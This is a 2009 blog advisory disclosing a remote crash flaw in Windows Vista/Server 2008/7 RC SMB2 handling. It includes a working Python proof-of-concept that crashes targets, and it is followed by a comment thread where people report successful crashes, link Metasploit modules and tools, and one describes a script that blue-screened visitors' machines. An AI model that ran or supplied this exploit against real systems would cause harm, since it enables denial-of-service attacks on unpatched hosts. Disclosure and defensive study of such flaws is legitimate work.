Monday, September 7, 2009

[Updated]Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-------------------------
Windows vista and newer Windows comes with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-------------------------
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.

IV. PROOF OF CONCEPT
-------------------------

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-------------------------
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.

VII. SOLUTION
-------------------------
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-------------------------
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish them advisory.

120 comments:

lulz said...

lulz

Anonymous said...

If this vuln is real. Why didnt you reported it to Microsoft MSRC?
Because it looks really stupid to publish this kind of thing on Full disclosure.

Anonymous said...

"Anonymous said...
If this vuln is real. Why didnt you reported it to Microsoft MSRC?
Because it looks really stupid to publish this kind of thing on Full disclosure."

He may have months ago. Security through obscurity. If there's an inherent problem, it's important for anyone to allow end-users to make an informed decision about the risks involved. In short; MS need to jump on this with both feet rather than dawdle as is there usual response.

Anonymous said...

Anonymous said...
If this vuln is real. Why didnt you reported it to Microsoft MSRC?
Because it looks really stupid to publish this kind of thing on Full disclosure.

VII. SOLUTION
-------------------------
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

Perhaps read the text rather than voice opinions from an undeserved soap-box.

Zach said...

@Anonymous:

I have tried this exploit myself on a Windows 7 machine and it didn't work. Perhaps the code itself isn't the actual exploit, but an example of what it is/could be.

I tried this code from a Mac and from a backtrack image... neither caused the remote Windows 7 machine to BSOD. SMB was turned on and worked normally otherwise (as expected).

Laurent Gaffié blog said...

@zach, on windows7/vista you need to enable file sharing in your network connection center.

agux said...

Has it been tested with an IDS / firewall or that kind of software?

Marcos Orallo said...

Tested against Windows7 x64, it does not work.

Laurent Gaffié blog said...

@Anonymous:
"Because it looks really stupid to publish this kind of thing on Full disclosure."

Not more stupid as to not submit this new code to a normal S.Q.A routine, before shipping that product on any P.C. by default.

Laurent Gaffié blog said...

@Marcos Orallo
enable file sharing;
it works.

buherator said...

Seems to work on 32 bit Vista, result: http://m.blog.hu/bu/buhera/image/vista_smbv2.png

Anonymous said...

Works also ugainst Windows 2008 Server.

Anonymous said...

Laurent, this is a Remote code execution vulnerability not merely a DoS.

http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15

Laurent Gaffié blog said...

So you see Ruben says it works like a charm ...

Laurent Gaffié blog said...

Now, lets see what Microsoft will decide...

Anonymous said...

yeah Laurent, nice find btw.

Noisey said...

Omg, Laurent, you've better place some mistakes at PoC to prevent some kiddies from using it on LAN.

MaXe said...

I think it's great Laurent Gaffié disclosed it! Good work I bet you're using Linux at home just like me! Keep up the good work! Full Disclosure FTW!

I've made a Metasploit port of your PoC: (giving you credit of course)
http://pastie.org/609407


~ MaXe

Unknown said...

Epic

usagemayvary said...

slashdot front page nice job

quetzal said...
This comment has been removed by the author.
quetzal said...

What release of Windows 7 did u use?.
Im running the script on a Debian against a Windows 7 ultimate 64bits and a 32bits (both are 7600) and didn't work.
I have file sharing enabled, i can access both computer resources from a Windows XP without any problem (and im not even asked for user/password as i have it configured to not get asked for user/pass if that matters).

quetzal said...

Oh and i don't have running any firewall (windows firewall is disabled) or any antivirus software.

Anonymous said...

1. Disable windows firewall
2. Enable file sharing
3. Run exploit
4. Have Fun

Ned Ramsay said...

Nice find, thanks

Anonymous said...

Thanks.
But how in vista close Close SMB feature and ports please ?

Admin said...

Excellent, 2008 puked..and now that AD wont start.

Anonymous said...

You ran this code against your domain controller? Nice.

Admin said...

Add to that list bro...Windows 2008 With SP2!!!!!

Admin said...

It was a DC on VBOX. Was suppose to use it for a security seminar...LOLZ...

Anonymous said...

Does NOT work against the final realease of Windows 7 Enterprise in a domain environment, with firewall off and file sharing on. Doesn't work with firewall on and sharing off either :)

Does work against fully updated Vista Enterprise.

Admin said...

Yup does not work on 7 RTM build 7600 (without domain membership) as well. Anyone tried on 2008R2?

Jarek Prochal said...

full compatibility with w2k8 r2.

check yours firewall configuration !

www.aboo.pl

jawshie said...

How in the world did you even discover this?

Mark said...

No effect on Win7 Pro x64, filesharing enabled, verified via Wireshark (packet arrives & response to packet is sent)

Anonymous said...

New?


http://social.answers.microsoft.com/Forums/en-US/vistahardware/thread/3bdd46f8-d47d-4a67-930d-48bc9a18b2c7

http://support.microsoft.com/search/default.aspx?catalog=LCID%3D1033&query=DRIVER_POWER_STATE_FAILURE&mode=r

d3v1l said...

added to Metasploit http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/dos/windows/smb/smb2_negotiate_pidhigh.rb :)

Anonymous said...

When will be added remote code execution?

Bryant said...

Alright, publishing this was a very jerk move on Laurent's part.

He received a reply saying that no patch was available along with a workaround and he decided to post the exploit live anyway instead of waiting until it was fixed? Could a person be any more of a jerk? Microsoft takes all SMB vulnerabilities seriously, but instead of doing everyone a favor and just waiting until a patch were to be released, you decided to open it up to a realm of script kiddies bored at school/work who'll try to inflict as much damage as possible.

Sad.

jawshie said...

Bryant, that means that Microsoft will ACTUALLY patch it in a timely manner. It may be a jerk move against Microsoft but it is better for everybody else.

Anonymous said...

I disagree with Bryant and sympathizers.

After giving MS ample time to rectify the problem it is imperative that the information and work around be disclosed far and wide. MS was notified, failed to promptly release a patch, so the matter is now in the hands of the public domain to manage.

If you properly firewalled your ports properly in the first place the exploit would be a non-issue.

Am I the only one who tires of the post-exploit-publication QQ?

Anonymous said...

/cries

Coolm@x said...

Tried with no results on Vista Ultimate 32bit. nmap shows 445 open, packet captured with wireshark, but no effects.

Unknown said...

Good report if it was just a DoS, however god knows how many days of work this is going to cause admins due to remote code execution.

All in the name of security, heh.

TimeLord said...

Disable SMB 2.0 and the exploit doesn't work anymore:

http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm

Anonymous said...

Looks like the good old winnuke is back. http://rapidshare.com/files/277352935/WinnukeV7.zip.html

Anonymous said...

Windows 7 is immune to this vulnerability.

coconono said...

if you run ESET Lab's NOD32 AV, its firewall filters the ports in such a way that you can't run the exploit.

Anonymous said...

works like a charm, tested on Vista Home Premium 32bit (also works through Norton 360, 2009 - in [SHARED] ?default? local network)

Anonymous said...

Windows 7 RTM and Server 2008 R2 RTM are not vulnerable to this exploit. 7/2008 R2 RC are, as are Vista/2008. (Grouped by kernel family).

It would be nice if they'd backport whatever they fixed in RTM to Vista, but as far as running Windows 7 / R2 beta versions, I don't sympathize.

As far as vulnerabilty reporting, it's not really acurate to say that this bug impacts Windows 7 if you haven't tested the RTM. If you are running RC code, you get what you pay for.

Anonymous said...

Releasing this allows people to protect themselves before there's a patch. You're assuming that only HE has found the exploit, a white-hat with good intentions. You think other people who might have found this are going to be so nice?

LiamW said...

I'm having trouble getting it too work, but that just could be because it's complaining about bad headers in the crafted packet (it's been a while since i've done this..). Testing it out against win7 32 and 64 at home..hope to have results soon. Wireshark capture shows the packet is received by the remote computer and responded too, but no bsod. The problem seems to be in the header checksum.

Anonymous said...

What i cant beleive is that a bug in the filesharing part of the operating system can crash the whole thing... who writes these things?

Anonymous said...

Windows 7 is not affected. The affected version was Windows7 RC but not full officila release.

http://www.microsoft.com/technet/security/advisory/975497.mspx

MaXe said...

@Anonymous (above my post)

That's exactly why i agree fully with full disclosure.

I imagine a group of blackhats getting angry cause yet another hidden 0day was disclosed :-P So I don't think people should get angry at Laurent, I'd do the same, willingly knowing that some script kiddies, worm makers and such would abuse it as well. But that's just the yin and yang principle.

HDM has by the way also added another module to the Metasploit framework which exploits another bug in the negotiate protocol / smb service.

Anonymous said...

Sorry i caught this a little late, should have expected something like this.

Thanks for the B-day prez .. HIGH: --> :-)

Anonymous said...

To any of you complaining about disclosure ... your lucky this isnt weaponized and already wormed.

Its funny how after what, 200 million dollars+ and 7 years all it takes is 1 guy with enough brain power and that special kind of addiction to poke a hole in anything!

Cheers on the great find

Unknown said...

Very nice work indeed.

Anonymous said...

Great...

It works against Windows 2008 but not Windows 7

I'm checking the Microsoft Tuesday Updates and there's nothing related.

Sniper

Rob said...

Putting this kind of info on publicly on the monday before patchday show malice.

Not disclosing responsibly is also bad faith.

Attention seeking misfit ?

Anonymous said...

Cool..good finding! Hope all security vendors have covered for this kind of vulnerability instead waiting for Microsoft patch.

darkst0rm said...

nice find laurent!
congraz!!

full-disclosure for life!!

Anonymous said...

Microsoft released advisory 975497 today saying that WIn7RTM and WIn2008R2 RTM are not vulnerable

Anonymous said...

C sources (if somebody needs): http://pastie.org/610829
Thanks for great work, Laurent!

Anonymous said...

awesome ;D

Anonymous said...

Does this remote exploit affect Vista even if the firewall--which is on by default--is running?

Anonymous said...

yes

Anonymous said...

"yes" ^^^^

From reading up on this, the exploit doesn't work if Vista's firewall is set to 'Public' mode.

Anonymous said...

Winsock C source :)
http://pastie.org/611098

Anonymous said...

Windows users make me laugh.

Seriously, any serious vendor would have contacted the guy begging him - not to disclose anything till a patch was released. But since this is M$...

Tough for them. If they start treating security like a real issue maybe i'll start using them.

Anonymous said...

The fix is diabling SMB2 via the registry and rebooting. This can be deployed through group policy.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"SMB2"=dword:00000000

Anonymous said...

http://rapidshare.com/files/277781832/SMB2-TEST-FLAW-EDUCATIONAL.rar.html

I found an app that xploits this vulnerability but it needs .net.

kallisti5 said...

This has been tested and works great.. here at my work we made a quick php script to send the malformed SMB packet to incoming systems.. everytime a Vista user visits the page their machine BSOD. :)

I have tested this and verified it works on:
Vista x32 -- All versions
Vista x64 -- All versions
Windows 7 -- Release cannidates (NOT RTM)
Windows Server 2008, pre RC2

Any machine above with 445 open and SMB (enabled by default) is effected.


Great job on the full disclosure!

Anonymous said...

Alexander: You have way too much time on your hands...

Laurent: Excellent find!

Phil said...

It was only a matter of time before a zero day was descovered, how long will it be before microsoft patch this bug?

Anonymous said...

I am development a scanner pool of threads in net of type B, C ... etc ... in python. I wait useful. Is in spanish but its very easy of translate.

http://blogricardo.wordpress.com/2009/09/09/escaner-exploit-para-windows-vista-2008/

Anonymous said...

With all respect to Laurent and other commenters, the importance of not disclosing this kind of things is that: even with a disclosure a lot of good people won't know of it.
Instead, a lot of non-capable attackers now might have a method to harm, that would never have discovered on their own.
Microsoft will develop a solution, release a patch and still a lot of customers will be vulnerable months later. (cont.)

Anonymous said...

(cont.) Making Microsoft face red does not help anyone. While you have the right to tire of post-exploit patching, experience demonstrates that patching accelerates exploiting, and makes it broader.
Those who have a good IT management practice will probably not be vulnerable with or without a patch. Those who are vulnerable now are only exposed to a greater risk.

Anonymous said...

http://www.caughq.org/advisories/disclosure.html

Anonymous said...

Yes, that sounds beautiful. But an available patch does not make a patched system

d3ck4 said...

nice finding..
tested and work like a charm but not for win7 RTM.

just disable file & printer share for now until the patch release and block port 445 as well

why leaving this service enable when u dont rely on it?

hail macs.. lulz

Laurent Gaffié blog said...

My tests confirmed that this security issue is NOT Service Pack related, and was introduced by KB942624 (MS07-063) patch in december 2007.

Anonymous said...

One news outlet reported that Laurent submitted the bug to Microsoft, but there was a typo in the e-mail address.

Mistakes happen, but a little extra effort to contact the vendor could have been made. I know that Microsoft has forms, forums, and telephone numbers. Not saying you got to contact them all, but a single e-mail does not due diligence make.

If there was no response after several attempts over several days, then a public disclosure is warranted.

Anonymous said...

You didn't submitted the bug to the editor (or with a typo in the address, are you not able to type an address or was it on purpose), you post a proof of concept on patch day, when MS has no time to fix the hole before next month. It looks like you did everything on purpose.
It would be funny for MS if nobody would use their software for important things. Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow.

Laurent, you're an asshole.

Laurent Gaffié blog said...

Hey not so "Anonymous",

Regarding my disclosure with MS, that's my choice, and i still think that on this specific case it was a good idea you'll see why.

However concerning the typo, i send the advisory (only to advise them) to microssoft.com , shit happens.

Full-Disclosure is usefull in such case because:

Anyone (including MS) who would have tested this critical component would have found this bug in a matter of seconds.

It showed this specific bug (my payload) was introduced by a security patch (MS07-063), showing us no S.Q.A and security testing
as been done on it before shipping it on any P.C
Even worse; an official Microsoft spokeman told Robert Lemos :
"We found this issue independently through our fuzzing processes and implemented the fix into Windows 7 RTM (release to manufacturer)
and Windows Server 2008 R2," see: http://www.technologyreview.com/blog/unsafebits/24105/?a=f

This mean, they knew about this issue but failed at protecting them customers.
Now that i published the remote teardrop advisory, they use the word "irresponsible disclosure" while patching on emergency what they
knew since a long time.
This is a serious error, as the bug was very easy to find, it was only a matter of time before someone disclose it...

Anonymous said...

Laurent Gaffie,

Great research and discover. Also, great that you have disclosed it so the developper have to work on it.

MaXe said...

A working exploit has beem made commercially available by Immunity Inc. (see securityfocus.org for a link)

A shame that it is only commercially available, cause I'd like to see how it abuses the 16 bits :-) Anyone care to share at least some sort of information?

Anonymous said...

It is also here: http://thepiratebay.org/torrent/5083672/Windows_Vista_7_SMB2.0_NEGOTIATE_PROTOCOL_Remote_BSOD_Tool

Abdullah Muqim said...

Hello guys,
I have a file server(windows server 2008), but when I disable the smb2 it disconnect all the map drive of my client (in local network) do you know how to disable smb2 without interrupting map dire (file sharing)
Thanks in advance.

Abdullah Muqim said...

I have got the solution. Need to uncheck the default file and printer sharing from firewall and allow port 139, 445 from ip subnet.

Niel Roos said...

aam's solution could work

Anonymous said...

"It would be funny for MS if nobody would use their software for important things. Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow."

If people used OSes that deserve the name, that wouldn't happen.

r4 sdhc said...

What VULNERABILITY is it exactly about? A shame that it is only commercially available. Anyone care to share at least some sort of information?

tax jobs said...

i'll be sure to bookmark your blog

Legit Freebies Guy said...

So I suppose it's fixed now that it was in Windows 7 RC release?

Mehrdad said...

guys,

Thats microsoft fault... laurent only posted the PoC for BSoD ! not the working RCE exploit, ok?

so, you are jerk Bryant! cuz you use windows ;-)

Unknown said...

thanks for sharing this site. there are lots of ebooks are available from here

http://feboook.blogspot.com

daniel john said...

Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow."
Term paper

Aditya Subramaniam said...

Tried running the script on my windows 7 virtual machine. packets were being sent and received (as noticed on wireshark) however, windows 7 did not crash. has the patch been made on the recent releases of windows 7? i had downloaded my present copy from msdnaa a week back...

jon said...

nice

tava tea said...

Security through obscurity. If there's an inherent problem, it's important for anyone to allow end-users to make an informed decision about the risks involved. In short; MS need to jump on this with both feet rather than dawdle as is there usual response.

Jignesh said...

Nowadays,I m using Mozilla and graphic are superb and excllent.

Window vista was biggest flop .

tiffany jewelry said...

Nice article, They are lucky it was you who discovered this and not someone with more sinister goals.

karan said...

nice article , i liked it very much
thanks for sharing..

MicroConsole said...

Security through obscurity. If there's an inherent problem, it's important for anyone to allow end-users to make an informed decision about the risks involved.

Content Lockdown said...

Even with a disclosure a lot of good people won't know of it. Instead, a lot of non-capable attackers now might have a method to harm, that would never have discovered on their own.

Latest Messages said...

That is amazing post A+ of this fantastic article

Anonymous said...

He didn't report it to M$ cause he's not a Microsoft fanboy like most commenter here.

yamla pagla deewana review said...

This was fantastic post

refinance mortgage said...

I have had so many problems with vista that I have already given up and moved on. Window 7 is cool so far.

auctions said...

wow...good info here....thanks for sharing...

Jilius said...

WOW the information here is good. it somehow gave me an idea. thanks for the share.

Sms Lån said...

Very nice article, They are lucky it was you who discovered this and not someone with more sinister goals...

rakesh said...

very useful really helpful

omegle said...

Very nice article, indeed! Thanks.

serwis laptopów Katowice said...

WoW ! a lot of comments. I really dont know before that is so common ... Thank You for article.

Anonymous said...

Works on Windows Derver 2008 Standard sp1

Anonymous said...

It's very easy to find out any matter on web as compared to books, as I
found this post at this web page.

Anonymous said...

I’m not that much of a internet reader to be honest but your
sites really nice, keep it up! I'll go ahead and bookmark
your site to come back later on. Cheers

Used PC Distributor said...

Nice Blog Post !

Post a Comment